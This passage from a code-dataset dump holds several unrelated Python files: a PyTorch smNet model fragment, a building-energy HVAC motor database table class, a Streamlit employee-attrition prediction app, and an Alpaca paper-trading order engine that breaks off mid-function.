resBlock(256, 256, 1), resBlock(256, 256, 1),\n conv1x1(256, 128, 1), nn.BatchNorm2d(128, 1e-3), nn.PReLU(),\n conv1x1(128, 64,1), nn.BatchNorm2d(64, 1e-3), nn.PReLU(),\n conv1x1(64, 1, 1), nn.BatchNorm2d(1, 1e-3), nn.PReLU()\n )\n self.FCs = nn.Sequential(\n nn.Linear(int((opt.imHeight/4) * (opt.imWidth/4)), int(output))\n )\n else:\n self.features = nn.Sequential(\n nn.Conv2d(int(iChannels), 64, 7, 1, 3), nn.BatchNorm2d(64, 1e-3), nn.PReLU(),\n nn.Conv2d(64, 128, 5, 1, 2), nn.BatchNorm2d(128, 1e-3), nn.PReLU(),\n resBlock(128, 128, 1), resBlock(128, 128, 1), resBlock(128, 128, 1),\n resBlock(128, 256, 4),\n resBlock(256, 256, 1), resBlock(256, 256, 1), resBlock(256, 256, 1),\n resBlock(256, 1024, 4),\n resBlock(1024, 1024, 1), resBlock(1024, 1024, 1), resBlock(1024, 1024, 1),\n conv1x1(1024, int(output), 1)\n )\n\n def forward(self, x):\n x = self.features(x)\n if opt.labelsize > 12:\n x = x.view(-1, x.size(1))\n else:\n x = x.view(-1, x.size(2)*x.size(3))\n x = self.FCs(x)\n if opt.mode == 'xy' or 'z':\n x = self.Hardtanh(x)\n return x\n","repo_name":"HuanglabPurdue/smNet","sub_path":"smNet_Pytorch/smNet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4382,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"72624412072","text":"from building_energy_standards_data.database_engine.database import DBOperation\nfrom building_energy_standards_data.database_engine.database_util import (\n is_float,\n getattr_either,\n)\n\nRECORD_HELP = \"\"\"\nMust provide a tuple that contains:\ntemplate: TEXT\nnumber_of_poles: NUMERIC\ntype: TEXT\nsynchronous_speed: TEXT\nminimum_capacity: NUMERIC\nmaximum_capacity: NUMERIC\nnominal_full_load_efficiency: NUMERIC\nannotation: TEXT 
(optional)\n\"\"\"\n\nCREATE_HVAC_REQUIREMENT_MOTORS_TABLE = \"\"\"\nCREATE TABLE IF NOT EXISTS %s\n(id INTEGER PRIMARY KEY, \ntemplate TEXT NOT NULL, \nnumber_of_poles NUMERIC,\ntype TEXT NOT NULL,\nsynchronous_speed NUMERIC NOT NULL,\nminimum_capacity NUMERIC,\nmaximum_capacity NUMERIC NOT NULL,\nnominal_full_load_efficiency NUMERIC NOT NULL,\nannotation TEXT);\n\"\"\"\n\nINSERT_A_MOTOR_RECORD = \"\"\"\n INSERT INTO %s (\ntemplate, \nnumber_of_poles,\ntype,\nsynchronous_speed,\nminimum_capacity,\nmaximum_capacity,\nnominal_full_load_efficiency,\nannotation\n) \nVALUES (?, ?, ?, ? , ?, ?, ?, ?);\n\"\"\"\n\nRECORD_TEMPLATE = {\n \"template\": \"\",\n \"number_of_poles\": 0.0,\n \"type\": \"\",\n \"synchronous_speed\": 0.0,\n \"minimum_capacity\": 0.0,\n \"maximum_capacity\": 0.0,\n \"nominal_full_load_efficiency\": 0.0,\n \"annotation\": \"\",\n}\n\n\nclass HVACMinimumRequirementMotors(DBOperation):\n def __init__(self, table_name, initial_data_directory):\n super(HVACMinimumRequirementMotors, self).__init__(\n table_name=table_name,\n record_template=RECORD_TEMPLATE,\n initial_data_directory=initial_data_directory,\n create_table_query=CREATE_HVAC_REQUIREMENT_MOTORS_TABLE % table_name,\n insert_record_query=INSERT_A_MOTOR_RECORD % table_name,\n )\n\n def get_record_info(self):\n \"\"\"\n A function to return the record info of the table\n :return:\n \"\"\"\n return RECORD_HELP\n\n def validate_record_datatype(self, record):\n str_expected = [\n \"template\",\n \"type\",\n ]\n\n for f in str_expected:\n if record.get(f):\n assert isinstance(\n record[f], str\n ), f\"{f} requires to be a string, instead got {record[f]}\"\n\n float_expected = [\n \"number_of_poles\",\n \"synchronous_speed\",\n \"minimum_capacity\",\n \"maximum_capacity\",\n \"nominal_full_load_efficiency\",\n ]\n\n for f in float_expected:\n if record.get(f):\n assert is_float(\n record.get(f)\n ), f\"{f} requires to be numeric data type, instead got {record[f]}\"\n return True\n\n def _preprocess_record(self, record):\n \"\"\"\n\n :param record: dict\n :return:\n \"\"\"\n\n return (\n getattr_either(\"template\", record),\n getattr_either(\"number_of_poles\", record),\n getattr_either(\"type\", record),\n getattr_either(\"synchronous_speed\", record),\n getattr_either(\"minimum_capacity\", record),\n getattr_either(\"maximum_capacity\", record),\n getattr_either(\"nominal_full_load_efficiency\", record),\n getattr_either(\"annotation\", record),\n )\n","repo_name":"pnnl/building-energy-standards-data","sub_path":"building_energy_standards_data/database_tables/hvac_minimum_requirement_motors.py","file_name":"hvac_minimum_requirement_motors.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"13328082944","text":"import streamlit as st\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import (accuracy_score, log_loss, classification_report)\nfrom imblearn.over_sampling import SMOTE\n\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import StratifiedShuffleSplit\n\nimport SessionState\n\n'''\n# Retenção de Funcionários\n\nEste conjunto de dados foi disponibilizado pela IBM e pode ser acessado neste [link](https://www.kaggle.com/pavansubhasht/ibm-hr-analytics-attrition-dataset) do 
Kaggle.\n\nO desenvolvimento do modelo e análise de features tem como referência este [notebook](https://www.kaggle.com/arthurtok/employee-attrition-via-ensemble-tree-based-methods) disponível também no Kaggle.\n\nOs dados são fictícios.\n\nOs campos de avaliação seguem estas definições:\n'''\n\ncol1, col2 = st.beta_columns(2)\n\nwith col1:\n '''\n Education\n\n * 1 Below College\n * 2 College\n * 3 Bachelor\n * 4 Master\n * 5 Doctor\n\n EnvironmentSatisfaction\n\n * 1 Low\n * 2 Medium\n * 3 High\n * 4 Very High\n\n JobInvolvement\n\n * 1 Low\n * 2 Medium\n * 3 High\n * 4 Very High\n\n JobSatisfaction\n\n * 1 Low\n * 2 Medium\n * 3 High\n * 4 Very High\n '''\n\nwith col2:\n '''\n PerformanceRating\n\n * 1 Low\n * 2 Good\n * 3 Excellent\n * 4 Outstanding\n\n RelationshipSatisfaction\n\n * 1 Low\n * 2 Medium\n * 3 High\n * 4 Very High\n\n WorkLifeBalance\n\n * 1 Bad\n * 2 Good\n * 3 Better\n * 4 Best\n '''\n\n'''\n## Conjunto de Dados\n\n'''\n\nattrition = pd.read_csv('data/WA_Fn-UseC_-HR-Employee-Attrition.csv')\n\nattrition = attrition.drop(['EmployeeCount'], axis=1)\nattrition = attrition.drop(['EmployeeNumber'], axis=1)\nattrition = attrition.drop(['StandardHours'], axis=1)\nattrition = attrition.drop(['Over18'], axis=1)\n\nattrition\n\n\n'''\n## Análise Exploratória Rápida\n\n\n'''\n\nst.vega_lite_chart(attrition, {\n \"mark\": \"rect\",\n \"width\": 700,\n \"height\": 300,\n \"encoding\": {\n \"x\": {\n \"bin\": {\"maxbins\": 60},\n \"field\": \"Age\",\n \"type\": \"quantitative\"\n },\n \"y\": {\n \"bin\": {\"maxbins\": 40},\n \"field\": \"TotalWorkingYears\",\n \"type\": \"quantitative\"\n },\n \"color\": {\n \"aggregate\": \"count\",\n \"type\": \"quantitative\"\n }\n },\n \"config\": {\n \"view\": {\n \"stroke\": \"transparent\"\n }\n }\n}\n)\n\nst.vega_lite_chart(attrition, {\n \"mark\": \"rect\",\n \"width\": 700,\n \"height\": 300,\n \"encoding\": {\n \"x\": {\n \"bin\": {\"maxbins\": 60},\n \"field\": \"Age\",\n \"type\": \"quantitative\"\n },\n \"y\": {\n \"bin\": {\"maxbins\": 40},\n \"field\": \"YearsInCurrentRole\",\n \"type\": \"quantitative\"\n },\n \"color\": {\n \"aggregate\": \"count\",\n \"type\": \"quantitative\"\n }\n },\n \"config\": {\n \"view\": {\n \"stroke\": \"transparent\"\n }\n }\n}\n)\n\nst.vega_lite_chart(attrition, {\n \"mark\": \"rect\",\n \"width\": 700,\n \"height\": 300,\n \"encoding\": {\n \"x\": {\n \"bin\": {\"maxbins\": 60},\n \"field\": \"YearsAtCompany\",\n \"type\": \"quantitative\"\n },\n \"y\": {\n \"bin\": {\"maxbins\": 40},\n \"field\": \"JobSatisfaction\",\n \"type\": \"quantitative\"\n },\n \"color\": {\n \"aggregate\": \"count\",\n \"type\": \"quantitative\"\n }\n },\n \"config\": {\n \"view\": {\n \"stroke\": \"transparent\"\n }\n }\n}\n)\n\nst.vega_lite_chart(attrition, {\n \"mark\": \"rect\",\n \"width\": 700,\n \"height\": 300,\n \"encoding\": {\n \"x\": {\n \"bin\": {\"maxbins\": 60},\n \"field\": \"WorkLifeBalance\",\n \"type\": \"quantitative\"\n },\n \"y\": {\n \"bin\": {\"maxbins\": 40},\n \"field\": \"JobSatisfaction\",\n \"type\": \"quantitative\"\n },\n \"color\": {\n \"aggregate\": \"count\",\n \"type\": \"quantitative\"\n }\n },\n \"config\": {\n \"view\": {\n \"stroke\": \"transparent\"\n }\n }\n}\n)\n\n# Define a dictionary for the target mapping\ntarget_map = {'Yes': 1, 'No': 0}\n# Use the pandas apply method to numerically encode our attrition target variable\nattrition[\"Attrition_numerical\"] = attrition[\"Attrition\"].apply(\n lambda x: target_map[x])\n\n# creating a list of only numerical values\nnumerical = 
[u'Age', u'DailyRate', u'DistanceFromHome',\n u'Education', u'EnvironmentSatisfaction',\n u'HourlyRate', u'JobInvolvement', u'JobLevel', u'JobSatisfaction',\n u'MonthlyIncome', u'MonthlyRate', u'NumCompaniesWorked',\n u'PercentSalaryHike', u'PerformanceRating', u'RelationshipSatisfaction',\n u'StockOptionLevel', u'TotalWorkingYears',\n u'TrainingTimesLastYear', u'WorkLifeBalance', u'YearsAtCompany',\n u'YearsInCurrentRole', u'YearsSinceLastPromotion', u'YearsWithCurrManager']\n\nplt.figure(figsize=(19, 15))\n\ncorrMatrix = attrition[numerical].corr()\n\n'''\n## Matriz de Correlação\n\n\nSuporta a decisão de escolhas de atributos para serem utilizados no treinamento. Quanto mais correlação houver, melhor será para o modelo, o inverso também ocorre, pois ao abrir mão de atributos que não contribuem para o aprendizado para o modelo, ele ficará mais preciso e mais leve.\n\n'''\n\nst.set_option('deprecation.showPyplotGlobalUse', False)\nsns.heatmap(corrMatrix)\n# Use Matplotlib to render seaborn\nst.pyplot()\n\n'## Atributos Utilizados no Treinamento '\n\n# Drop the Attrition_numerical column from attrition dataset first - Don't want to include that\nattrition = attrition.drop(['Attrition_numerical'], axis=1)\n\n# Empty list to store columns with categorical data\ncategorical = []\nfor col, value in attrition.iteritems():\n if value.dtype == 'object':\n categorical.append(col)\n\n# Store the numerical columns in a list numerical\nnumerical = attrition.columns.difference(categorical)\ncategorical.remove('Attrition')\n\natributes_numerical = st.multiselect(\n 'Atributos Numéricos Selecionados', numerical.values.tolist(), numerical.values.tolist())\natributes_categorical = st.multiselect(\n 'Atributos Categóricos Selecionados', categorical, categorical)\n\n# Store the categorical data in a dataframe called attrition_cat\nattrition_cat = attrition[atributes_categorical]\nattrition_cat = pd.get_dummies(attrition_cat)\n\n# Store the numerical features to a dataframe attrition_num\nattrition_num = attrition[atributes_numerical]\n\n# Concat the two dataframes together columnwise\nattrition_final = pd.concat([attrition_num, attrition_cat], axis=1)\n\n# Define a dictionary for the target mapping\ntarget_map = {'Yes': 1, 'No': 0}\n# Use the pandas apply method to numerically encode our attrition target variable\ntarget = attrition[\"Attrition\"].apply(lambda x: target_map[x])\n\nsession_state = SessionState.get(trained=False, train=None)\n\nseed = 1 # We set our random seed to zero for reproducibility\n# Random Forest parameters\nrf_params = {\n 'n_jobs': -1,\n 'n_estimators': 1000,\n 'max_features': 0.3,\n 'max_depth': 4,\n 'min_samples_leaf': 2,\n 'max_features': 'sqrt',\n 'random_state': seed,\n 'verbose': 0\n}\n\nrf = RandomForestClassifier(**rf_params)\n\n# Split data into train and test sets as well as for validation and testing\ntrain, test, target_train, target_val = train_test_split(attrition_final,\n target,\n train_size=0.80,\n random_state=1)\noversampler = SMOTE(random_state=0)\nsmote_train, smote_target = oversampler.fit_sample(train, target_train)\n\nif st.button('Treinar Modelo') or session_state.trained:\n 'Iniciando o treinamento...'\n\n rf.fit(smote_train, smote_target)\n\n session_state.model = rf\n session_state.trained = True\n\n 'Treinamento terminado.'\n 'Verificando predições...'\n\n rf_predictions = rf.predict(test)\n\n st.success('Modelo treinado e valido com sucesso!')\n score = \"Pontuação de Precisão (Accurácia): {}\".format(\n accuracy_score(target_val, rf_predictions))\n 
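Two details of the training setup above are worth hedged fixes: `oversampler.fit_sample` is the old imbalanced-learn spelling (newer releases only ship `fit_resample`), and the 80/20 split is unstratified, which can skew the minority "Yes" class. A minimal sketch with the same variable names:

from imblearn.over_sampling import SMOTE
from sklearn.model_selection import train_test_split

train, test, target_train, target_val = train_test_split(
    attrition_final, target,
    train_size=0.80,
    stratify=target,       # keep the Yes/No ratio identical in both splits
    random_state=1)

# fit_resample is the current imbalanced-learn API; SMOTE is applied to
# the training portion only, so the held-out set stays untouched.
smote_train, smote_target = SMOTE(random_state=0).fit_resample(train, target_train)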
session_state.score = score\n\n st.info(score)\n\n plt.figure(figsize=(19, 15))\n (pd.Series(rf.feature_importances_, index=attrition_final.columns.values)\n .nlargest(20)\n .plot(kind='barh'))\n st.pyplot()\n\n test_value = [20, 2000, 10, 5, 2, 94, 3, 4, 4, 5993, 19479, 8, 11, 3, 1, 0, 8, 0, 1, 6, 4,\n 0, 5, 0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1]\n\n '## Teste de Inferência Unitária'\n 'Supondo um determinado profissional, varie os valores que foram utilizados no treinamento e compare com os resultados ao final, incluindo sua probabilidade.'\n\n col2_1, col2_2, col2_3 = st.beta_columns(3)\n\n with col2_1:\n s_business_travel = st.selectbox(\n \"Business Travel\", attrition[\"BusinessTravel\"].unique())\n\n if s_business_travel == 'Non_Travel':\n test_value[23] = 1\n test_value[24] = 0\n test_value[25] = 0\n elif s_business_travel == 'Travel_Frequently':\n test_value[23] = 0\n test_value[24] = 1\n test_value[25] = 0\n else:\n test_value[23] = 0\n test_value[24] = 0\n test_value[25] = 1\n\n s_department = st.selectbox(\n \"Department\", attrition[\"Department\"].unique())\n\n if s_department == 'Human Resources':\n test_value[26] = 1\n test_value[27] = 0\n test_value[28] = 0\n elif s_business_travel == 'Research & Development':\n test_value[26] = 0\n test_value[27] = 1\n test_value[28] = 0\n else:\n test_value[26] = 0\n test_value[27] = 0\n test_value[28] = 1\n\n s_education_field = st.selectbox(\n \"Education Field\", attrition[\"EducationField\"].unique())\n\n if s_education_field == 'Human Resources':\n test_value[29] = 1\n test_value[30] = 0\n test_value[31] = 0\n test_value[32] = 0\n test_value[33] = 0\n test_value[34] = 0\n elif s_business_travel == 'Life Sciences':\n test_value[29] = 0\n test_value[30] = 1\n test_value[31] = 0\n test_value[32] = 0\n test_value[33] = 0\n test_value[34] = 0\n elif s_business_travel == 'Marketing':\n test_value[29] = 0\n test_value[30] = 0\n test_value[31] = 1\n test_value[32] = 0\n test_value[33] = 0\n test_value[34] = 0\n elif s_business_travel == 'Medical':\n test_value[29] = 0\n test_value[30] = 0\n test_value[31] = 0\n test_value[32] = 1\n test_value[33] = 0\n test_value[34] = 0\n elif s_business_travel == 'Other':\n test_value[29] = 1\n test_value[30] = 0\n test_value[31] = 0\n test_value[32] = 0\n test_value[33] = 1\n test_value[34] = 0\n else:\n test_value[29] = 0\n test_value[30] = 0\n test_value[31] = 0\n test_value[32] = 0\n test_value[33] = 0\n test_value[34] = 1\n\n with col2_2:\n s_gender = st.selectbox(\"Gender\", attrition[\"Gender\"].unique())\n\n if s_gender == 'Human Resources':\n test_value[35] = 1\n test_value[36] = 0\n else:\n test_value[35] = 0\n test_value[36] = 1\n\n s_job_role = st.selectbox(\"Job Role\", attrition[\"JobRole\"].unique())\n\n if s_job_role == 'Healthcare Representative':\n test_value[37] = 1\n test_value[38] = 0\n test_value[39] = 0\n test_value[40] = 0\n test_value[41] = 0\n test_value[42] = 0\n test_value[43] = 0\n test_value[44] = 0\n test_value[45] = 0\n elif s_job_role == 'Human Resources':\n test_value[37] = 0\n test_value[38] = 1\n test_value[39] = 0\n test_value[40] = 0\n test_value[41] = 0\n test_value[42] = 0\n test_value[43] = 0\n test_value[44] = 0\n test_value[45] = 0\n elif s_job_role == 'Laboratory Technician':\n test_value[37] = 0\n test_value[38] = 0\n test_value[39] = 1\n test_value[40] = 0\n test_value[41] = 0\n test_value[42] = 0\n test_value[43] = 0\n test_value[44] = 0\n test_value[45] = 0\n elif s_job_role == 'Manager':\n test_value[37] = 0\n 
test_value[38] = 0\n test_value[39] = 0\n test_value[40] = 1\n test_value[41] = 0\n test_value[42] = 0\n test_value[43] = 0\n test_value[44] = 0\n test_value[45] = 0\n elif s_job_role == 'Manufacturing Director':\n test_value[37] = 0\n test_value[38] = 0\n test_value[39] = 0\n test_value[40] = 0\n test_value[41] = 1\n test_value[42] = 0\n test_value[43] = 0\n test_value[44] = 0\n test_value[45] = 0\n elif s_job_role == 'Research Director':\n test_value[37] = 0\n test_value[38] = 0\n test_value[39] = 0\n test_value[40] = 0\n test_value[41] = 0\n test_value[42] = 1\n test_value[43] = 0\n test_value[44] = 0\n test_value[45] = 0\n elif s_job_role == 'Research Scientist':\n test_value[37] = 0\n test_value[38] = 0\n test_value[39] = 0\n test_value[40] = 0\n test_value[41] = 0\n test_value[42] = 0\n test_value[43] = 1\n test_value[44] = 0\n test_value[45] = 0\n elif s_job_role == 'Sales Executive':\n test_value[37] = 0\n test_value[38] = 0\n test_value[39] = 0\n test_value[40] = 0\n test_value[41] = 0\n test_value[42] = 0\n test_value[43] = 0\n test_value[44] = 1\n test_value[45] = 0\n else:\n test_value[37] = 0\n test_value[38] = 0\n test_value[39] = 0\n test_value[40] = 0\n test_value[41] = 0\n test_value[42] = 0\n test_value[43] = 0\n test_value[44] = 0\n test_value[45] = 1\n\n s_marital_status = st.selectbox(\n \"Marital Status\", attrition[\"MaritalStatus\"].unique())\n\n if s_marital_status == 'Divorced':\n test_value[46] = 1\n test_value[47] = 0\n test_value[48] = 0\n elif s_business_travel == 'Married ':\n test_value[46] = 0\n test_value[47] = 1\n test_value[48] = 0\n else:\n test_value[46] = 0\n test_value[47] = 0\n test_value[48] = 1\n\n with col2_3:\n\n s_over_time = st.selectbox(\"Over Time\", attrition[\"OverTime\"].unique())\n\n if s_over_time == 'No':\n test_value[49] = 1\n test_value[50] = 0\n else:\n test_value[49] = 0\n test_value[50] = 1\n\n col3_1, col3_2 = st.beta_columns(2)\n\n with col3_1:\n n_age = st.slider(\"Age\", int(attrition[\"Age\"].min()), int(\n 2*attrition[\"Age\"].max()), test_value[0])\n test_value[0] = n_age\n\n n_daily_rate = st.slider(\"Daily Rate\", int(attrition[\"DailyRate\"].min()), int(\n 2*attrition[\"DailyRate\"].max()), test_value[1])\n test_value[1] = n_daily_rate\n\n n_dist_home = st.slider(\"Distance from Home\", int(attrition[\"DistanceFromHome\"].min(\n )), int(2*attrition[\"DistanceFromHome\"].max()), test_value[2])\n test_value[2] = n_dist_home\n\n n_education = st.slider(\"Education\", int(attrition[\"Education\"].min()), int(\n 2*attrition[\"Education\"].max()), test_value[3])\n test_value[3] = n_education\n\n n_env_satisf = st.slider(\"Environment Satisfaction\", int(attrition[\"EnvironmentSatisfaction\"].min(\n )), int(attrition[\"EnvironmentSatisfaction\"].max()), test_value[4])\n test_value[4] = n_env_satisf\n\n n_hour_rate = st.slider(\"Hourly Rate\", int(attrition[\"HourlyRate\"].min()), int(\n 2*attrition[\"HourlyRate\"].max()), test_value[5])\n test_value[5] = n_hour_rate\n\n n_job_involv = st.slider(\"Job Involvement\", int(attrition[\"JobInvolvement\"].min(\n )), int(attrition[\"JobInvolvement\"].max()), test_value[6])\n test_value[6] = n_job_involv\n\n n_job_level = st.slider(\"Job Level\", int(attrition[\"JobLevel\"].min()), int(\n attrition[\"JobLevel\"].max()), test_value[7])\n test_value[7] = n_job_level\n\n n_job_satisf = st.slider(\"Job Satisfaction\", int(attrition[\"JobSatisfaction\"].min(\n )), int(attrition[\"JobSatisfaction\"].max()), test_value[8])\n test_value[8] = n_job_satisf\n\n n_month_income = st.slider(\"Monthly 
Income\", int(attrition[\"MonthlyIncome\"].min(\n )), int(2*attrition[\"MonthlyIncome\"].max()), test_value[9])\n test_value[9] = n_month_income\n\n n_monthy_rate = st.slider(\"Monthly Rate\", int(attrition[\"MonthlyRate\"].min()), int(\n 2*attrition[\"MonthlyRate\"].max()), test_value[10])\n test_value[10] = n_monthy_rate\n\n num_comp_work = st.slider(\"Num. Companies Worked\", int(\n 2*attrition[\"NumCompaniesWorked\"].min()), int(attrition[\"NumCompaniesWorked\"].max()), test_value[11])\n test_value[11] = num_comp_work\n\n with col3_2:\n\n sal_hike = st.slider(\"% Salary Hike\", int(\n attrition[\"PercentSalaryHike\"].min()), int(2*attrition[\"PercentSalaryHike\"].max()), test_value[12])\n test_value[12] = sal_hike\n\n n_perf_rating = st.slider(\"Performance Rating\", int(attrition[\"PerformanceRating\"].min(\n )), int(attrition[\"PerformanceRating\"].max()), test_value[13])\n test_value[13] = n_perf_rating\n\n n_relat_satisf = st.slider(\"Relationship Satisfaction\", int(attrition[\"RelationshipSatisfaction\"].min(\n )), int(attrition[\"RelationshipSatisfaction\"].max()), test_value[15])\n test_value[14] = n_relat_satisf\n\n n_stock_op = st.slider(\"Stock Option Level\", int(\n attrition[\"StockOptionLevel\"].min()), int(attrition[\"StockOptionLevel\"].max()), test_value[15])\n test_value[15] = n_stock_op\n\n n_total_work_year = st.slider(\"Total Working Years\", int(\n 2*attrition[\"TotalWorkingYears\"].min()), int(attrition[\"TotalWorkingYears\"].max()), test_value[16])\n test_value[16] = n_total_work_year\n\n n_train_last_y = st.slider(\"Training Times Last Year\", int(\n 2*attrition[\"TrainingTimesLastYear\"].min()), int(attrition[\"TrainingTimesLastYear\"].max()), test_value[17])\n test_value[17] = n_train_last_y\n\n n_worklife_bal = st.slider(\"Work Life Balance\", int(\n attrition[\"WorkLifeBalance\"].min()), int(attrition[\"WorkLifeBalance\"].max()), test_value[18])\n test_value[18] = n_worklife_bal\n\n n_years_comp = st.slider(\"Years at Company\", int(attrition[\"YearsAtCompany\"].min(\n )), int(2*attrition[\"YearsAtCompany\"].max()), test_value[19])\n test_value[19] = n_years_comp\n\n n_years_role = st.slider(\"Years in Current Role\", int(attrition[\"YearsInCurrentRole\"].min(\n )), int(2*attrition[\"YearsInCurrentRole\"].max()), test_value[20])\n test_value[20] = n_years_role\n\n n_years_promo = st.slider(\"Years since Last Promotion\", int(attrition[\"YearsSinceLastPromotion\"].min(\n )), int(2*attrition[\"YearsSinceLastPromotion\"].max()), test_value[21])\n test_value[21] = n_years_promo\n\n n_years_manager = st.slider(\"Years with Current Manager\", int(\n attrition[\"YearsWithCurrManager\"].min()), int(2*attrition[\"YearsWithCurrManager\"].max()), test_value[22])\n test_value[22] = n_years_manager\n\n test_value = [test_value]\n\n try:\n\n prediction_id = rf.predict(test_value)[0]\n proba = int(100*rf.predict_proba(test_value)[0][prediction_id])\n\n if rf.predict(test_value)[0] == 1:\n st.warning(\"Attrition (\" + str(proba) + \"%)\")\n else:\n st.success(\"No Attrition (\" + str(proba) + \"%)\")\n st.balloons()\n\n st.progress(proba)\n\n except Exception as e:\n st.warning(e)\n","repo_name":"EYLatamSouth/ta-employee-attrition","sub_path":"streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":20845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12222576515","text":"import requests, json\nfrom config import *\nimport alpaca_trade_api as tradeapi\nimport time\nimport pandas as 
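The hand-maintained `test_value` one-hot bookkeeping above is fragile: several `elif` branches test `s_business_travel` where `s_department`, `s_education_field`, or `s_marital_status` was clearly intended, the Education Field "Other" branch sets indices 29 and 33 at the same time, and the Relationship Satisfaction slider reads its default from `test_value[15]` but writes `test_value[14]`. Deriving the inference row from the same `pd.get_dummies` columns used in training avoids hand-kept indices entirely; a sketch with a hypothetical helper:

def build_row(raw, feature_columns):
    # Hypothetical helper: encode one raw record exactly like the training
    # data, then align it to the training column order so dummy names and
    # positions can never drift out of sync with manual indices.
    row = pd.get_dummies(pd.DataFrame([raw]))
    return row.reindex(columns=feature_columns, fill_value=0)

sample = build_row({"Age": 20, "OverTime": "No", "JobRole": "Manager"}, attrition_final.columns)
prediction = rf.predict(sample)[0]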
pd\nimport datetime\n# for more documentation you can check https://algotrading101.com/learn/alpaca-trading-api-guide/\n\nclass OrderEngine(object):\n\n def __init__(self, price, symbol, side):\n self.price = price\n self.symbol = symbol\n self.side = side\n BASE_URL = \"https://paper-api.alpaca.markets\"\n self.ACCOUNT_URL = \"{}/v2/account\".format(BASE_URL)\n self.ORDERS_URL = \"{}/v2/orders\".format(BASE_URL)\n self.HEADERS = {'APCA-API-KEY-ID': API_KEY, 'APCA-API-SECRET-KEY': SECRET_KEY}\n self.api = tradeapi.REST(API_KEY, SECRET_KEY, BASE_URL, api_version='v2')\n self.account = self.api.get_account()\n self.balance = self.account.cash \n self.conn = tradeapi.stream2.StreamConn(API_KEY, SECRET_KEY, BASE_URL)\n self.positions_list = self.api.list_positions()\n self.portfolio_history = self.initinalise_portfolio_history()\n self.qty = self.KELLY_CRITERION()\n \n\n def initinalise_portfolio_history(self):\n todays_date = datetime.date.today()\n \n day = int(todays_date.strftime('%d'))\n if day < 10:\n day = int(todays_date.strftime('%d')[1]) \n day = '0' + str(day)\n\n month = int(todays_date.strftime('%m'))\n if month < 10:\n month = str(todays_date.strftime('%m'))\n\n try:\n portfolio_history = self.api.get_portfolio_history(\n date_end='2021-{}-{}'.format(month,day),\n period='1D',\n timeframe='5Min'\n )\n print('2021-{}-{}'.format(month,day))\n except requests.exceptions.ConnectionError as err: \n print(err)\n portfolio_history = ''\n return portfolio_history\n\n def initialise_universe(self):\n #cancel all orders before end of the day\n self.api.close_all_positions()\n # a bunch of other api calls that can be useful\n self.api.cancel_all_orders()\n #create a random watchlist\n universe = self.api.create_watchlist()\n print(self.account)\n print(self.balance) \n print(universe)\n return universe\n # if you want to know the leverage\n #print(api.get_account_configurations())\n\n def initialise_alpaca_universe(self):\n assets = self.api.list_assets()\n assets_list = []\n for asset in assets:\n assets_list.append(asset.symbol)\n df = pd.DataFrame(assets_list)\n df.to_csv('Alpace tradable assets.csv')\n\n def update_probability_w(self):\n trade_won = 0\n day_trade_count = self.account.daytrade_count\n # you can access portfolio history from the database\n\n for p_and_l in self.portfolio_history.profit_loss:\n try:\n if p_and_l > 0:\n trade_won += 1\n else:\n pass\n except TypeError:\n pass\n p_w = trade_won/day_trade_count\n return p_w\n\n # kelly criterion assumes that returns are stationary\n def KELLY_CRITERION(self):\n try:\n p_w = self.update_probability_w()\n except ZeroDivisionError:\n p_w = 0.5\n p_l = 1 - p_w\n lot_size = (2*p_w - p_l)/2\n try:\n qty = (lot_size*float(self.balance))/self.price\n qty = round(qty)\n except ZeroDivisionError:\n qty = 0\n except ValueError:\n qty = 1\n except OverflowError:\n qty = 1\n #UHEWRBVIUWBVQIUVBQPOIUVQOIUBVQIUBQIUBVOIUEQRBNQIUBVNOIUQBVLQI\n qty = 1\n return qty\n\n def get_account(self):\n r = requests.get(self.ACCOUNT_URL, headers=self.HEADERS)\n\n return json.loads(r.content)\n\n def create_order(self,qty=0, time_in_force='gtc'):\n if qty == 0:\n pass\n else:\n self.qty = qty\n types = 'market'\n if self.side == 'buy':\n order = self.api.submit_order(\n self.symbol,\n self.qty,\n self.side, \n types,\n time_in_force, \n order_class='bracket',\n stop_loss={'stop_price': 0.995*self.price}, \n take_profit={'limit_price': 1.01*self.price}\n )\n elif self.side == 'sell':\n order = self.api.submit_order(\n self.symbol,\n self.qty,\n self.side, 
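The day/month massaging in `initinalise_portfolio_history` (the method name itself is a typo for "initialise") is unnecessary: `strftime('%d')` and `strftime('%m')` are already zero-padded, and the year is hardcoded to 2021. The whole block collapses to one call, sketched here with the method's own names:

# Equivalent to the day/month branches plus the string format above,
# without the hardcoded year:
date_end = datetime.date.today().strftime('%Y-%m-%d')
portfolio_history = self.api.get_portfolio_history(
    date_end=date_end, period='1D', timeframe='5Min')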
\n types,\n time_in_force, \n order_class='bracket',\n stop_loss={'stop_price': 1.005*self.price}, \n take_profit={'limit_price': 0.99*self.price}\n )\n else:\n print('what is the side')\n print(order)\n time.sleep(1)\n\n def get_orders(self):\n r = requests.get(self.ORDERS_URL, headers=self.HEADERS)\n\n return json.loads(r.content)\n\n # Submit a trailing stop order to sell 1 share of Apple at a\n # trailing stop of\n def create_trailing_sl_order(self, get_order=False):\n order = self.api.submit_order(\n symbol=self.symbol,\n qty=self.qty,\n side=self.side,\n type='trailing_stop',\n trail_percent=0.4, # stop price will be hwm*0.996\n time_in_force='gtc',\n )\n if get_order:\n return order\n else:\n pass\n\n def get_order_by_id(self):\n # Submit a market order and assign it a Client Order ID.\n self.api.submit_order(\n symbol='AAPL',\n qty=1,\n side='buy',\n type='market',\n time_in_force='gtc',\n client_order_id='my_first_order'\n )\n\n # Get our order using its Client Order ID.\n my_order = self.api.get_order_by_client_order_id('my_first_order')\n print('Got order #{}'.format(my_order.id))\n \n def portfolio_history_error(self, func):\n def wrapper(*a,**kw):\n try:\n container = func(*a,**kw)\n except 